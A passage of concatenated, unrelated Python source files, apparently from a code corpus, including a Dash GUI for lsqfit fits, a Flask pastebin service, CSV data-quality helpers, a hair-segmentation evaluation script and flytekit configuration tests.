customer shipping addr """ store = models.ForeignKey("shop.Store", null=True, on_delete=models.SET_NULL) full_name = models.CharField(max_length=255) email = models.CharField(max_length=255) addr = models.TextField(blank=True, null=True) def __str__(self): return self.full_name ckoerber/lsqfit-guilsqfitgui/lsqfitgui.py """This module provides interfaces for running a lsqfit dashboard GUI. The :class:`FitGUI` class provides the interface to `lsqfit` providing dynamic html elements which can be embedded into a dash (flask) app. The :func:`run_server` method provides a convenient interface which also starts the Dash app which is accessible by any (local) browser. """ # noqa: E501 from typing import Optional, Callable, Dict, List, Any from tempfile import NamedTemporaryFile from numpy import eye, allclose from gvar import dumps, evalcorr from lsqfit import nonlinear_fit from lsqfit._extras import unchained_nonlinear_fit from dash import Dash, html, dcc from lsqfitgui.frontend.dashboard import ( get_layout, update_layout_from_prior, update_layout_from_meta, toggle_prior_widget, EXTERNAL_STYLESHEETS, EXTERNAL_SCRIPTS, ASSETS, UPDATE_LAYOUT_CALLBACK_ARGS, SAVE_FIT_CALLBACK_ARGS, EXPORT_PRIOR_CALLBACK_ARGS, FCN_SOURCE_CALLBACK, DEFAULT_PLOTS, ) from lsqfitgui.util.models import ( lsqfit_from_multi_model_fit, lsqfit_from_multi_model_fit_wrapper, ) class FitGUI: """Class which initializes the dashboard.""" def __init__( # ignore: D107 self, fit: Optional[nonlinear_fit] = None, fit_setup_function: Optional[Callable] = None, fit_setup_kwargs: Optional[Dict] = None, meta_config: Optional[List[Dict]] = None, use_default_content: bool = True, ): """Initialize the fit gui. You must either provide a `fit` object or a `fit_setup_function` function to initialize this class. Note that this does not create a ``Dash`` app; the app is created by calling :meth:`FitGUI.setup_app` (which is implicitly called by :meth:`FitGUI.run_server`). Arguments: fit: Non-linear fit object. fit_setup_function: Function which returns a non-linear fit object. Its keywords are provided by `fit_setup_kwargs`. fit_setup_kwargs: Initial kwargs which are passed to the `fit_setup_function` for creating the first fit object. 
meta_config: Configuration for the fit_setup_kwargs represented in the GUI. These must match `dcc.Input `_ arguments. use_default_content: Add default elements like the function documentation and plot tabs to the GUI. Example: The most basic example just requires a nonlinear_fit object:: fit = lsqfit.nonlinear_fit(data, fcn=fcn, prior=prior) gui = FitGUI(fit) More sophisticated examples, where also meta arguments are used, are:: from dash import Dash def generate_fit(n_exp=3): ... return lsqfit.nonlinear_fit(data, fcn=fcn, prior=prior) fit_setup_kwargs = {"n_exp": 3} meta_config = [{"name": "n_exp", "type": "number", "min": 1, "max": 10, "step": 1}] gui = FitGUI( fit_setup_function=generate_fit, fit_setup_kwargs=fit_setup_kwargs, meta_config=meta_config ) fit_gui.run_server(host=host, debug=debug, port=port) """ # noqa: E501 self.name: str = None """Name of the app displayed as title and browser tab title.""" self._fit_setup_function = fit_setup_function self._fit_setup_kwargs = fit_setup_kwargs or {} self._meta_config = meta_config self._use_default_content = use_default_content self._layout = None self.get_additional_content: Callable[[nonlinear_fit], html.Base] = None """Function used to determine dynamic content depending on fit results.""" self.plots: List[Dict[str, Any]] = [] """List of dictionaries specifying plots rendered in the tab element. Must contain at least the `name: str` and `fcn:Callable[[nonlinear_fit], Figure]` items. Example: Plot the fit results:: def plot_fcn(fit): yy = fit.fcn(fit.x, fit.p) return plot_gvar(fit.x, yy, kind="band") gui.plots.append({"name": "Fit results", "fcn": plot_fcn}) **Allowed keywords are** * **name** *(str)*: The name presented in the tabs. * **fcn** *(Callable[[nonlinear_fit], Figure])*: The function used to generate the plot. Must take a plot and kwargs as an input. * **description** *(str)*: Text displayed below figure (can contain latex using). * **kwargs** *(Dict[str, Any])*: A dictionary passed to the above function. * **static_plot_gvar** *(Dict[str, Any])*: Static data passed to :func:`plot_gvar` added to the same figure (i.e., to also plot data as an comparison). See also the :attr:`lsqfitgui.frontend.content.DEFAULT_PLOTS`. """ # noqa: E501 if self._use_default_content: self.plots += DEFAULT_PLOTS if fit is None and fit_setup_function is None: raise ValueError( "You must either specify the fit or fit setup function" " to initialize the GUI." 
) elif fit_setup_function is not None: self._initial_fit = fit_setup_function(**self._fit_setup_kwargs) else: self._initial_fit = fit if isinstance(self._initial_fit, unchained_nonlinear_fit): self._initial_fit = lsqfit_from_multi_model_fit(self._initial_fit) if self._fit_setup_function is not None: self._fit_setup_function = lsqfit_from_multi_model_fit_wrapper( self._fit_setup_function ) if not allclose( evalcorr(self.initial_fit.prior.flatten()), eye(len(self.initial_fit.prior.flatten())), ): raise NotImplementedError("Prior of original fit contains correlations.") self._callbacks = [ self._update_layout_callback, self._save_fit_callback, self._export_prior_callback, ] if self._use_default_content: self._callbacks += [FCN_SOURCE_CALLBACK] self._setup_old = list(self._fit_setup_kwargs.values()) self._prior_keys_old = None self._prior_values_old = None self._fit = self.initial_fit self._app = None @property def fit(self) -> nonlinear_fit: """Return current fit object.""" return self._fit @property def initial_fit(self) -> nonlinear_fit: """Return fit object used to initialize the app.""" return self._initial_fit @property def layout(self) -> html.Base: """Return the current layout.""" if self._layout is None: self._layout = get_layout( self.initial_fit, name=self.name, meta_config=self._meta_config, meta_values=self._fit_setup_kwargs, use_default_content=self._use_default_content, get_additional_content=self.get_additional_content, plots=self.plots, ) return self._layout def setup_app(self, app: Optional[Dash] = None): """Initialize the dash app. Sets up layout and callbacks and create a ``Dash`` instance if not provided. Arguments: app: The dash app which runs the server. If provided, requires to manually set up style sheets, scripts and assets. Raises RuntimeError if app already set up. 
""" if self._app is not None: raise RuntimeError("App already initialized.") if not app: app = Dash( self.name, external_stylesheets=EXTERNAL_STYLESHEETS, external_scripts=EXTERNAL_SCRIPTS, assets_folder=ASSETS, ) app.title = self.name app.layout = html.Div(children=self.layout, id="body") for callback in self._callbacks: kwargs = callback.kwargs if hasattr(callback, "kwargs") else {} app.callback(*callback.args, **kwargs)(callback) self._app = app @property def app(self) -> Dash: """Return plotly dash app.""" return self._app def run_server(self, *args, **kwargs): """Wrapper to self.app.run_server.""" if not self.app: self.setup_app() return self.app.run_server(*args, **kwargs) # Callbacks def _update_layout_callback(self, prior_ids, prior_values, setup): """Update the layout given new prior input.""" prior_keys = [idx["name"] for idx in prior_ids] if setup != self._setup_old: self._layout, self._fit = update_layout_from_meta( setup, self._fit_setup_function, self._fit_setup_kwargs, name=self.name, meta_config=self._meta_config, use_default_content=self._use_default_content, get_additional_content=self.get_additional_content, plots=self.plots, ) self._setup_old = setup elif ( prior_keys != self._prior_keys_old or prior_values != self._prior_values_old ): self._layout, self._fit = update_layout_from_prior( dict(zip(prior_keys, prior_values)), self.fit, setup=setup, name=self.name, meta_config=self._meta_config, use_default_content=self._use_default_content, get_additional_content=self.get_additional_content, plots=self.plots, ) self._prior_keys_old = prior_keys self._prior_values_old = prior_values return self.layout _update_layout_callback.args = UPDATE_LAYOUT_CALLBACK_ARGS _update_layout_callback.kwargs = {"prevent_initial_call": True} def _save_fit_callback(self, *args, **kwargs): with NamedTemporaryFile() as out: out.write(dumps(self.fit)) return dcc.send_file(out.name, filename="fit.p") _save_fit_callback.args = SAVE_FIT_CALLBACK_ARGS _save_fit_callback.kwargs = {"prevent_initial_call": True} def _export_prior_callback(self, *args, **kwargs): return toggle_prior_widget(*args, **kwargs) _export_prior_callback.args = EXPORT_PRIOR_CALLBACK_ARGS _export_prior_callback.kwargs = {"prevent_initial_call": True} def run_server( fit: Optional[nonlinear_fit] = None, name: str = "Lsqfit GUI", fit_setup_function: Optional[Callable[[Any], nonlinear_fit]] = None, fit_setup_kwargs: Optional[Dict] = None, meta_config: Optional[List[Dict]] = None, use_default_content: Optional[bool] = True, get_additional_content: Optional[Callable[[nonlinear_fit], html.Base]] = None, additional_plots: Optional[Dict[str, Callable]] = None, run_app: bool = True, debug: bool = True, host: str = "localhost", port: int = 8000, ) -> FitGUI: """Initialize the GUI and start the dash app. Requires either a `fit` object or a `fit_setup_function`. Arguments: fit: Non-linear fit object. name: Name of the app displayed as title and browser tab title. fit_setup_function: Function which returns a non-linear fit object. Its keywords are provided by `fit_setup_kwargs`. fit_setup_kwargs: Initial kwargs which are passed to the `fit_setup_function` for creating the first fit object. meta_config: Configuration for the fit_setup_kwargs represented in the GUI. These must match `dcc.Input `_ arguments. use_default_content: Add default elements like the function documentation and plot tabs to the GUI. get_additional_content: Function used to determine dynamic content depending on fit results. 
additional_plots: List of dictionaries specifying plots rendered in the tab element. Must contain at least the `name: str` and `fcn:Callable[[nonlinear_fit], Figure]` items. This populates :attr:`FitGUI.plots`. See also the :attr:`lsqfitgui.frontend.content.DEFAULT_PLOTS`. run_app: Call run server on the dash app. debug: Run the dash app in debug mode. Only used if `run_app=True`. host: The hosting address of the dash app. Only used if `run_app=True`. port: The port of the dash app. Only used if `run_app=True`. Example: The most basic example just requires a nonlinear_fit object:: fit = lsqfit.nonlinear_fit(data, fcn=fcn, prior=prior) app = run_server(fit) More sophisticated examples, where also meta arguments are used, are:: def generate_fit(n_exp=3): ... return lsqfit.nonlinear_fit(data, fcn=fcn, prior=prior) fit_setup_kwargs = {"n_exp": 3} meta_config = [{"name": "n_exp", "type": "number", "min": 1, "max": 10, "step": 1}] fit_gui = run_server( fit_setup_function=generate_fit, fit_setup_kwargs=fit_setup_kwargs, meta_config=meta_config ) """ # noqa: E501 fit_gui = FitGUI( fit=fit, fit_setup_function=fit_setup_function, fit_setup_kwargs=fit_setup_kwargs, meta_config=meta_config, use_default_content=use_default_content, ) fit_gui.name = name fit_gui.get_additional_content = get_additional_content fit_gui.plots += additional_plots or [] fit_gui.setup_app() if run_app: fit_gui.run_server(host=host, debug=debug, port=port) return fit_gui IISH/dpi #!/usr/bin/python import re import sys sys.path.append('/home/strikes/clioinfra/modules') from config import configuration, load_dataverse, findpid def metadata(dataset): #return ('xxx', '', '') config = configuration() (pid, fileid, revid, clearpid) = findpid(dataset) #return ('xxx', '', '') data = {} if pid: query = pid apiurl = config['dataverseroot'] + "/api/search?q=" + query + '&key=' + config['key'] + '&type=dataset' data = load_dataverse(apiurl) return (data, pid, fileid) zmunro/pastething #!/usr/bin/env python3 from random import getrandbits, choice from base64 import urlsafe_b64encode from datetime import date, datetime, timedelta from contextlib import contextmanager from psycopg2.extras import DictCursor from psycopg2.pool import SimpleConnectionPool import pygments from pygments import highlight from pygments.lexers import get_lexer_by_name, guess_lexer, get_all_lexers from pygments.formatters import HtmlFormatter from flask import Flask, \ render_template, url_for, flash, \ request, redirect, Response, abort, \ get_flashed_messages, make_response from stats import pasteview, pastecount, getstats import config app = Flask(__name__) app.secret_key = config.secret_key app.config['MAX_CONTENT_LENGTH'] = config.max_content_length app.jinja_env.globals['year'] = date.today().year #local server date #Setup connection pool connpool = SimpleConnectionPool(config.connpool_min, config.connpool_max, config.dsn) @contextmanager def getcursor(cursor_factory=None): con = connpool.getconn() try: if cursor_factory: yield con.cursor(cursor_factory=cursor_factory) else: yield con.cursor() con.commit() finally: connpool.putconn(con) def plain(text): resp = Response(text) resp.headers['Content-Type'] = 'text/plain; charset=utf-8' return resp def set_cache_control(resp, max_age=69): resp.cache_control.public = True resp.cache_control.max_age = int(max_age) return resp def paste_stats(text): stats = {} stats['lines'] = len(text.split('\n')) stats['sloc'] = stats['lines'] for line in text.split('\n'): if not line.strip(): stats['sloc'] -= 1 stats['size'] = 
len(text.encode('utf-8')) return stats def url_collision(cursor, route): for rule in app.url_map.iter_rules(): if rule.rule == '/' + route: return True with cursor as cur: cur.execute("SELECT pasteid FROM pastes WHERE pasteid = %s;", (route,)) if cur.fetchone(): return True return False def db_newpaste(cursor, opt, stats): date = datetime.utcnow() date += timedelta(hours=float(opt['ttl'])) with cursor as cur: cur.execute("""INSERT INTO pastes (pasteid, token, lexer, expiration, burn, paste, paste_lexed, size, lines, sloc) VALUES (%s, %s, %s, %s, %s, %s, %s, %s, %s, %s);""", \ (opt['pasteid'], opt['token'], opt['lexer'], \ date, opt['burn'], opt['paste'], opt['paste_lexed'], \ stats['size'], stats['lines'], stats['sloc'])) def db_getpaste(cursor, pasteid): with cursor as cur: cur.execute(("""SELECT * FROM pastes WHERE pasteid = %s;"""), (pasteid,)) return cur.fetchone() def db_deletepaste(cursor, pasteid): with cursor as cur: cur.execute(("""DELETE FROM pastes WHERE pasteid = %s;"""), (pasteid,)) def db_burn(cursor, pasteid): with cursor as cur: cur.execute(("""UPDATE pastes SET burn = burn - 1 WHERE pasteid = %s;"""), (pasteid,)) @app.route('/', methods=['GET', 'POST']) @app.route('/newpaste', methods=['POST']) #only used via html form def newpaste(): if request.method == 'POST': paste_opt = {} for param in config.defaults: #init form parameters with defaults paste_opt[param] = config.defaults[param] for param in request.form: if param in paste_opt: paste_opt[param] = request.form[param] if paste_opt['paste'] == '': return config.msg_empty_paste, 400 try: if not config.paste_limits['ttl_min'] < \ float(paste_opt['ttl']) < \ config.paste_limits['ttl_max']: return config.msg_invalid_ttl, 400 except ValueError: return config.msg_invalid_ttl, 400 lexer = "" try: if paste_opt['lexer'] == 'auto': lexer = guess_lexer(paste_opt['paste']) paste_opt['lexer'] = lexer.aliases[0] else: lexer = get_lexer_by_name(paste_opt['lexer']) except pygments.util.ClassNotFound: paste_opt['lexer'] = 'text' lexer = get_lexer_by_name(paste_opt['lexer']) formatter = HtmlFormatter(nowrap=True, cssclass='paste') paste_opt['paste_lexed'] = highlight(paste_opt['paste'], lexer, formatter) try: if paste_opt['burn'] == '' or paste_opt['burn'] == 0 or paste_opt['burn'] == config.defaults['burn']: paste_opt['burn'] = config.defaults['burn'] elif not config.paste_limits['burn_min'] <= int(paste_opt['burn']) <= config.paste_limits['burn_max']: return config.msg_invalid_burn, 400 except ValueError: return config.msg_invalid_burn, 400 url_len = config.url_len paste_opt['pasteid'] = '' while url_collision(getcursor(), paste_opt['pasteid']): paste_opt['pasteid'] = '' for _ in range(url_len): paste_opt['pasteid'] += choice(config.url_alph) url_len += 1 paste_opt['token'] = \ urlsafe_b64encode((getrandbits(config.token_len * 8)) \ .to_bytes(config.token_len, 'little')).decode('utf-8') stats = paste_stats(paste_opt['paste']) #generate text stats db_newpaste(getcursor(), paste_opt, stats) pastecount(getcursor()) #increment total pastes if request.path != '/newpaste': #plaintext reply if paste_opt['raw'] == 'true': reptype = 'viewraw' else: reptype = 'viewpaste' return config.domain + url_for(reptype, pasteid=paste_opt['pasteid']) + \ " | " + paste_opt['token'] + "\n" flash(paste_opt['token']) return redirect(paste_opt['pasteid']) elif request.method == 'GET': lexers_all = sorted(get_all_lexers()) return set_cache_control(make_response(render_template('newpaste.html', \ lexers_all=lexers_all, lexers_common=config.lexers_common, \ 
ttl=config.ttl_options, paste_limits=config.paste_limits)), config.nonpaste_max_age) @app.route('/<pasteid>', methods=['GET', 'DELETE']) def viewpaste(pasteid): if request.method == 'GET': direction = 'ltr' result = db_getpaste(getcursor(cursor_factory=DictCursor), pasteid) if not result: abort(404) if result['burn'] == 0 or result['expiration'] < datetime.utcnow(): db_deletepaste(getcursor(), pasteid) abort(404) elif result['burn'] > 0: db_burn(getcursor(), pasteid) pasteview(getcursor()) #count towards total paste views if request.args.get('raw') is not None: return set_cache_control(plain(result['paste']), config.paste_max_age) if request.args.get('d') is not None: direction = 'rtl' stats = {'lines': result['lines'], 'sloc': result['sloc'], 'size': result['size'], 'lexer': result['lexer'] } messages = get_flashed_messages() if messages: token = messages[0] else: token = '' del_url = url_for('deletepaste', pasteid=pasteid, token=token) resp = make_response(render_template('viewpaste.html', \ stats=stats, paste=result['paste_lexed'].split("\n"), direction=direction, delete=del_url)) return set_cache_control(resp, config.paste_max_age) elif request.method == 'DELETE': result = db_getpaste(getcursor(cursor_factory=DictCursor), pasteid) if not result: return config.msg_err_404, 404 elif 'token' in request.form and result['token'] == request.form['token']: db_deletepaste(getcursor(), pasteid) return config.msg_paste_deleted, 200 elif 'token' in request.headers and result['token'] == request.headers.get('token'): db_deletepaste(getcursor(), pasteid) return config.msg_paste_deleted, 200 else: return config.msg_err_401, 401 @app.route('/plain/<pasteid>', methods=['GET', 'DELETE']) @app.route('/raw/<pasteid>', methods=['GET', 'DELETE']) def viewraw(pasteid): if request.method == 'GET': result = db_getpaste(getcursor(cursor_factory=DictCursor), pasteid) if not result: return config.msg_err_404, 404 if result['burn'] == 0 or result['expiration'] < datetime.utcnow(): db_deletepaste(getcursor(), pasteid) return config.msg_err_404, 404 elif result['burn'] > 0: db_burn(getcursor(), pasteid) pasteview(getcursor()) #count towards total paste views return set_cache_control(plain(result['paste']), config.paste_max_age) elif request.method == 'DELETE': result = db_getpaste(getcursor(cursor_factory=DictCursor), pasteid) if not result: return config.msg_err_404, 404 elif 'token' in request.form and result['token'] == request.form['token']: db_deletepaste(getcursor(), pasteid) return config.msg_paste_deleted, 200 elif 'token' in request.headers and result['token'] == request.headers.get('token'): db_deletepaste(getcursor(), pasteid) return config.msg_paste_deleted, 200 else: return config.msg_err_401, 401 else: return "invalid http method\n" @app.route('/<pasteid>/<token>', methods=['GET']) def deletepaste(pasteid, token): result = db_getpaste(getcursor(cursor_factory=DictCursor), pasteid) if not result: abort(404) elif result['token'] == token: db_deletepaste(getcursor(), pasteid) return render_template('deleted.html') else: abort(401) @app.route('/about/api') def aboutapi(): return set_cache_control(make_response(render_template('api.html')), config.nonpaste_max_age) @app.route('/about') def aboutpage(): return set_cache_control(make_response(render_template('about.html')), config.nonpaste_max_age) @app.route('/stats') def statspage(): stats = getstats(getcursor(cursor_factory=DictCursor)) return set_cache_control(make_response(render_template('stats.html', stats=stats)), config.nonpaste_max_age) @app.errorhandler(404) def page_not_found(e): return 
render_template('404.html'), 404 @app.errorhandler(500) def internal_server_error(e): return render_template('500.html'), 500 if __name__ == '__main__': app.debug = False app.run() appinho/SASelfDrivingCar import numpy as np sensor_poses = [ (0.1425, 0.0, 0.0), (0.0, 0.09, np.pi / 2), (-0.1425, 0.0, np.pi), (0.0, -0.09, -np.pi / 2), ] scripts/config.py """ Configuration helpers. """ import os import sys # Paths DIRNAME = os.path.dirname(os.path.abspath(__file__)) ROOT_DIR = os.path.dirname(DIRNAME) def add_root_to_path() -> None: """ Adds the root of the repository to the path, so that we can import functions from src. """ sys.path.append(ROOT_DIR) """See Jupyter notebooks on how to use these module to assess data quality of .csv data. Note that python-3.6+ permits '_' as floating point separator, thus this module will treat '_'-separated float string as valid floating points. """ import json import pandas as pd import re ALPHANUMERIC_REGEXP = re.compile(r'[0-9a-zA-Z]') def read_csv_as_str(*args, **kwargs): """Read .csv but return contenst as-is string, i.e., no dtype conversion and nan treatment.""" kwargs['dtype'] = str kwargs['na_filter'] = False return pd.read_csv(*args, **kwargs) def check_all(df, max_value_to_show=10): """Perform check_columns() and check_datapoints_dtype().""" dfs = [check_columns(df, max_value_to_show), check_datapoints_dtype(df).iloc[:, 1:]] return pd.concat(dfs, axis=1) def check_possible_dtype(df, skip_fn=None, print_str=False): """Guess dtypes for each column in a dataframe, where dataframe must contains only string values otherwise exception occurs. :param df: a DataFrame whose all values must be strings. """ column = [] int_cnt = [] dec_cnt = [] str_cnt = [] d = {'column': column, 'int_cnt': int_cnt, 'dec_cnt': dec_cnt, 'str_cnt': str_cnt} for i in df.columns: ser = df[i].drop_duplicates() column.append(i) int_cnt.append(ser.apply(lambda x: is_int_str(x, skip_fn)).sum()) dec_cnt.append(ser.apply(lambda x: is_dec_str(x, skip_fn)).sum()) str_cnt.append(ser.apply(lambda x: is_not_number_str(x, skip_fn, print_str)).sum()) dtype_options_df = pd.DataFrame(d, columns=['column', 'int_cnt', 'dec_cnt', 'str_cnt']) # Best-effort guess on dtype guessed_dtype = dtype_options_df.apply(guess_dtype, axis=1).rename('guessed_type') return pd.concat([dtype_options_df, guessed_dtype], axis=1) def extract_str_values(df, skip_fn=None) -> pd.DataFrame: """ :rtype: """ column = [] str_values = [] d = {'column': column, 'str_values': str_values} for i in df.columns: ser = df[i].drop_duplicates() column.append(i) str_filter = ser.apply(lambda x: is_not_number_str(x, skip_fn)) str_ser = ser[str_filter] str_values.append(json.dumps(str_ser.tolist(), ensure_ascii=False)) return pd.DataFrame(d, columns=['column', 'str_values']) def check_columns(df, max_item_to_show=10): """Column dtype are computed from non-NaN values to prevent int64 columns becomes float64.""" column = [] dtyp = [] uniq_cnt = [] data_cnt = [] nan_cnt = [] sample_value = [] d = {'column': column, 'dtype': dtyp, 'uniq_cnt': uniq_cnt, 'data_cnt': data_cnt, 'nan_cnt': nan_cnt, 'sample_value': sample_value} for i in df.columns: col = df[i] uniques = col.unique() cnt = len(col) column.append(i) dtyp.append(col.dropna().dtype) uniq_cnt.append(len(uniques)) nan_cnt.append(cnt - col.count()) data_cnt.append(cnt) # Convert to string, otherwise jupyter notebook display without padding spaces # sample_value.append(str(uniques[:max_item_to_show].tolist())) sample_value.append(json.dumps(uniques[:max_item_to_show].tolist())) return 
pd.DataFrame(d, columns=['column', 'dtype', 'uniq_cnt', 'data_cnt', 'nan_cnt', 'sample_value']) def check_datapoints_dtype(df): """Only dtypes of non-NaN values, to prevent int64 columns from becoming float64.""" column = list(df.columns) dtypes = [] dtype_cnt = [] d = {'column': column, 'dtypes': dtypes, 'dtype_cnt': dtype_cnt} for i in column: dt = df[i].dropna().apply(lambda x: x.__class__.__name__).unique().tolist() dtypes.append(dt) dtype_cnt.append(len(dt)) return pd.DataFrame(d, columns=['column', 'dtypes', 'dtype_cnt']) def guess_dtype(x): if x['str_cnt'] > 0: return 'str' if x['dec_cnt'] != x['int_cnt']: return 'float' if x['int_cnt'] == 0 and x['dec_cnt'] == 0: return 'str' return 'int' def is_suspicious_str(s) -> bool: """Check whether string `s` looks suspicious (e.g., '' or a non-alphanumeric value).""" try: _ = s.encode('ascii') return True if s == '' else not ALPHANUMERIC_REGEXP.search(s) except UnicodeEncodeError: # Treat non-ASCII strings as suspicious only if they contain the CJK space. # NOTE: # - \u3000 is CJK whitespace # - There are other unicode whitespaces listed here: https://stackoverflow.com/a/37903645 return b'\\u3000' in s.encode('unicode_escape') except: print(s) raise def is_int_str(x: str, skip_fn=None): if skip_fn is not None and skip_fn(x): return False return x.isnumeric() def is_dec_str(x: str, skip_fn=None): if skip_fn is not None and skip_fn(x): return False try: float(x) except: return False else: return True def is_not_number_str(x: str, skip_fn=None, print_str=False): if skip_fn is not None and skip_fn(x): return False try: float(x) except: if print_str: print(x) return True else: return False """ → sort() method = used with lists → sorted() function = used with iterables """ students = [("Squidward", "F", 60), ("Sandy", "A", 33), ("Patrick", "D", 36), ("Spongebob", "B", 20), ("Mr. Krabs", "C", 78)] # students.sort() # sorted_students = sorted(students) # # for i in sorted_students: # print(i) # sort the list of tuples age = lambda ages:ages[2] students.sort(key=age, reverse=True) for i in students: print(i) students_tuple = (("Squidward", "F", 60), ("Sandy", "A", 33), ("Patrick", "D", 36), ("Spongebob", "B", 20), ("Mr. 
Krabs", "C", 78)) name = lambda names:names[0] sorted_students_tuple = sorted(students_tuple, key=name) print("---------------------") print("Students Tuple:") for i in sorted_students_tuple: print(i) 0 #coding:utf8 ''' Created on 2013-8-14 @author: lan ''' import memmode from firefly.dbentrust.madminanager import MAdminManager def load_config_data(): """从数据库中读取配置信息 """ def registe_madmin(): """注册数据库与memcached对应 """ MAdminManager().registe( memmode.tb_character_admin) MAdminManager().registe( memmode.tb_item_admin) MAdminManager().registe( memmode.tb_itemopen_admin) MAdminManager().registe( memmode.tb_skill_admin) MAdminManager().registe( memmode.tb_specskill_admin) MAdminManager().registe( memmode.tb_pet_admin) MAdminManager().registe( memmode.tb_petskill_admin) MAdminManager().registe( memmode.tb_partner_admin) MAdminManager().registe( memmode.tb_partnerskill_admin) chintak/fast-hair-segmentation import argparse import cPickle as pickle from glob import glob import multiprocessing as mp import numpy as np import os from scipy.io import loadmat from skimage.io import imread from sklearn.datasets import dump_svmlight_file from subprocess import call import sys import xgboost as xgb import tempfile as tm import configs from configs import HAIR, FACE, BKG import data from utils import * EPS = np.finfo(float).eps def pr_calc(yt, yp): tp = np.sum((yt == yp) & (yt == 1)) tn = np.sum((yt == yp) & (yt == 0)) fp = np.sum((yt != yp) & (yt == 1)) fn = np.sum((yt != yp) & (yt == 0)) return tp, tn, fp, fn def evaluate(names, keyps, model_fname, q): models = hr_name_to_models(model_fname) ttp, ttn, tfp, tfn = 0, 0, 0, 0 for k, (name, keyp) in enumerate(zip(names, keyps)): if not os.path.exists(name): continue im = imread(name) pr = hr_predict_single(im, keyp, models, overlap=0.5) gt = data.img2gt(name) tp, tn, fp, fn = pr_calc((gt==HAIR), (pr==HAIR)) ttp += tp; ttn += tn; tfp += fp; tfn += fn # if k % 50 == 0: print "[{}] Done {}".format(os.getpid(), k) q.put((ttp, ttn, tfp, tfn)) def eval(model_fname, mat_viz_file): print "==================================" q = mp.Queue() names, keypoints = data.mat_to_name_keyp(mat_viz_file) NUM_TRAIN_SAMPS = len(names) nprocs = mp.cpu_count() chunksize = int(NUM_TRAIN_SAMPS // nprocs) procs = [] for i in range(nprocs): lim = chunksize * (i+1) if i < nprocs - 1 else NUM_TRAIN_SAMPS p = mp.Process(target=evaluate, args=(names[chunksize*i:lim], keypoints[chunksize*i:lim], model_fname, q)) procs.append(p) p.start() for p in procs: p.join() ttp, ttn, tfp, tfn = 0., 0., 0., 0. for i in range(nprocs): tp, tn, fp, fn = q.get() ttp += tp; ttn += tn; tfp += fp; tfn += fn print "Model: {} pixel level:".format(model_fname) print "\thair accuracy = {:.03f}".format(1. 
- (tfp + tfn) / (EPS + tfn + tfp + ttp + ttn)) print "\tprec \t= {:.03f}".format((ttp) / (EPS + ttp + tfp)) print "\trec \t= {:.03f}".format((ttp) / (EPS + ttp + tfn)) def args(): args = argparse.ArgumentParser() args.add_argument('model_file', help='') args.add_argument('mat_file', help='') return args.parse_args() if __name__ == '__main__': parse = args() eval(parse.model_file, parse.mat_file) from typing import Dict from typing import List from typing import Union class BaseError(Exception): code: int = 50000 name: str = "UNKNOWN_ERROR" detail: Union[str, List[Dict]] = "" def __init__(self, detail: Union[str, List[Dict]] = ""): self.detail = detail @property def http_code(self) -> int: return self.code // 100 def dict(self) -> dict: return { "code": self.code, "name": self.name, "detail": self.detail, } class BadRequestError(BaseError): code: int = 40000 name: str = "BAD_REQUEST" class InvalidParameterError(BaseError): code: int = 40001 name: str = "INVALID_PARAMETER" class NotFoundError(BaseError): code: int = 40400 name: str = "PATH_NOT_FOUND" class ProcessNotFoundError(BaseError): code: int = 40401 name: str = "PROCESS_NOT_FOUND" class MethodNotAllowedError(BaseError): code: int = 40500 name: str = "METHOD_NOT_ALLOWED" class InternalError(BaseError): name: str = "INTERNAL_ERROR" class SupervisordError(BaseError): code: int = 50001 name: str = "SUPERVISORD_ERROR" """ Copyright 2020 The Magma Authors. This source code is licensed under the BSD-style license found in the LICENSE file in the root directory of this source tree. Unless required by applicable law or agreed to in writing, software distributed under the License is distributed on an "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the License for the specific language governing permissions and limitations under the License. 
""" import json from typing import Dict, List, NamedTuple from orc8r.protos.service303_pb2 import State ICMP_STATE_TYPE = "icmp_monitoring" ICMPMonitoringResponse = NamedTuple('ICMPMonitoringResponse', [('last_reported_time', int), ('latency_ms', float)]) def serialize_subscriber_states( sub_table: Dict[str, ICMPMonitoringResponse]) -> List[State]: states = [] for sub, icmp_resp in sub_table.items(): serialized = json.dumps(icmp_resp._asdict()) state = State( type=ICMP_STATE_TYPE, deviceID=sub, value=serialized.encode('utf-8') ) states.append(state) return states import os as _os from flytekit.configuration import common as _common from flytekit.core.utils import AutoDeletingTempDir as _AutoDeletingTempDir def test_lookup_waterfall_raw_env_var(): x = _common.FlyteStringConfigurationEntry("test", "setting", default=None) if "FLYTE_TEST_SETTING" in _os.environ: del _os.environ["FLYTE_TEST_SETTING"] assert x.get() is None _os.environ["FLYTE_TEST_SETTING"] = "lorem" assert x.get() == "lorem" def test_lookup_waterfall_referenced_env_var(): x = _common.FlyteStringConfigurationEntry("test", "setting", default=None) if "FLYTE_TEST_SETTING" in _os.environ: del _os.environ["FLYTE_TEST_SETTING"] assert x.get() is None if "TEMP_PLACEHOLDER" in _os.environ: del _os.environ["TEMP_PLACEHOLDER"] _os.environ["TEMP_PLACEHOLDER"] = "lorem" _os.environ["FLYTE_TEST_SETTING_FROM_ENV_VAR"] = "TEMP_PLACEHOLDER" assert x.get() == "lorem" def test_lookup_waterfall_referenced_file(): x = _common.FlyteStringConfigurationEntry("test", "setting", default=None) if "FLYTE_TEST_SETTING" in _os.environ: del _os.environ["FLYTE_TEST_SETTING"] assert x.get() is None with _AutoDeletingTempDir("config_testing") as tmp_dir: with open(tmp_dir.get_named_tempfile("name"), "w") as fh: fh.write("secret_password") _os.environ["FLYTE_TEST_SETTING_FROM_FILE"] = tmp_dir.get_named_tempfile("name") assert x.get() == "secret_password" # Copyright 2021 AIPlan4EU project # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. # from fractions import Fraction import re import sys import unified_planning as up import unified_planning.environment import unified_planning.walkers as walkers from unified_planning.model import DurativeAction, InstantaneousAction, Fluent, Parameter, Object from unified_planning.model.types import _UserType, _RealType, _IntType from typing import IO, Dict, List, Optional, cast, Union from io import StringIO ANML_KEYWORDS = {'action', 'and', 'constant', 'duration', 'else', 'fact', 'fluent', 'function', 'goal', 'in', 'instance', 'motivated', 'predicate', 'symbol', 'variable', 'when', 'with', 'decomposition', 'use', 'coincident', 'comprise', 'comprises', 'contain', 'contains', 'exists', 'forall', 'implies', 'iff', 'not', 'or', 'ordered', 'unordered', 'xor', 'UNDEFINED', 'all', 